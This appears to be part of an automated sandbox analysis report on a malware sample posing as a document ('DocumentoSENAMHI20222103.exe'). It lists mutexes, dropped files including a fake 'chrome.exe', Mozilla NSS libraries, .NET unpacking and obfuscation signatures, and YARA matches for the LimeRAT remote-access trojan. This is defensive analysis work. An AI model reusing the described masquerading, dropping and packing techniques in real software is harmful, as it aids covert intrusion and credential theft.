Source: C:\Users\user\AppData\Local\Temp\chrome.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Mutant created: \Sessions\1\BaseNamedObjects\776E9B90846C
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1033676:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1034132:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1034132:120:WilError_03
Source: Chrome[1].exe.1.dr, ????????????/?????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Chrome[1].exe.1.dr, ????????????/?????.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: wtqsCpda..exe.1.dr, ????????????/?????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: wtqsCpda..exe.1.dr, ????????????/?????.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: chrome.exe.15.dr, ????????????/?????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: chrome.exe.15.dr, ????????????/?????.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 15.0.wtqsCpda..exe.540000.3.unpack, ????????????/?????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.0.wtqsCpda..exe.540000.3.unpack, ????????????/?????.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: C:\Users\user\AppData\Local\Temp\chrome.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: DocumentoSENAMHI20222103.exe Static file information: File size 1320960 > 1048576
Source: DocumentoSENAMHI20222103.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x129400
Source: DocumentoSENAMHI20222103.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DocumentoSENAMHI20222103.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DocumentoSENAMHI20222103.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DocumentoSENAMHI20222103.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DocumentoSENAMHI20222103.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DocumentoSENAMHI20222103.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: DocumentoSENAMHI20222103.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: DocumentoSENAMHI20222103.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: vcruntime140.i386.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515401149.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: vcruntime140.i386.pdbGCTL source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515401149.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80756890980.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80741387008.0000000006411000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: msvcp140.i386.pdbGCTL source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80780346997.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83518836187.0000000006410000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80780142254.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80773395092.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782629346.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80784310301.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782812675.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.1.dr
Source: Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\ATL\OLEDB\Consumer\MultiRead\no.pdb source: DocumentoSENAMHI20222103.exe
Source: Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: USB.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: c:\Users\N A P O L E O N\Desktop\IconLib\obj\Debug\IconLib.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: c:\Users\N A P O L E O N\Desktop\IconLib\obj\Debug\IconLib.pdbd source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr
Source: Binary string: PIN.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: msvcp140.i386.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80780346997.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83518836187.0000000006410000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80780142254.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80773395092.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782629346.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80784310301.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782812675.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.1.dr
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81029831720.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81028272449.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81023544899.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81027987212.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81029572816.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81030566751.0000000005E59000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80765987792.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80760169574.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wuser32.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: PIN.pdbX source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80765987792.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80760169574.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr
Source: Binary string: wuser32.pdbUGP source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80756890980.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80741387008.0000000006411000.00000004.00000800.00020000.00000000.sdmp
Source: DocumentoSENAMHI20222103.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DocumentoSENAMHI20222103.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DocumentoSENAMHI20222103.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DocumentoSENAMHI20222103.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DocumentoSENAMHI20222103.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: Chrome[1].exe.1.dr, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: wtqsCpda..exe.1.dr, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: chrome.exe.15.dr, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.0.wtqsCpda..exe.540000.3.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.0.wtqsCpda..exe.540000.2.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.0.wtqsCpda..exe.540000.1.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.0.wtqsCpda..exe.540000.0.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.2.wtqsCpda..exe.540000.0.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 18.2.chrome.exe.760000.0.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 18.0.chrome.exe.760000.0.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 19.0.chrome.exe.a20000.0.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 19.2.chrome.exe.a20000.0.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 19.0.chrome.exe.a20000.1.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 19.0.chrome.exe.a20000.2.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 19.0.chrome.exe.a20000.3.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BE01B1 push ecx; ret 1_2_00BE01C4
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_00544C79 push ss; ret 15_2_00544C7E
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_0293F1F8 push esp; ret 15_2_0293F1F9
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_0293F99C push 0000003Bh; ret 15_2_0293F9AF
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_0293F9D5 push 0000003Bh; ret 15_2_0293F9DD
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 18_2_00764C79 push ss; ret 18_2_00764C7E
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 19_2_00A24C79 push ss; ret 19_2_00A24C7E
PE file contains sections with non-standard names
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Source: mozglue.dll.1.dr Static PE information: section name: .didat
Drops PE files
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe File created: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Local\Temp\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Local\Temp\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Local\Temp\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Local\Temp\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Roaming\wtqsCpda..exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chrome.exe File created: C:\Users\user\AppData\Local\Temp\IconLib.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Local\Temp\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Local\Temp\msvcp140.dll Jump to dropped file

Boot Survival
barindex
Yara detected LimeRAT
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.80087663971.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.83499752484.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80247515540.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
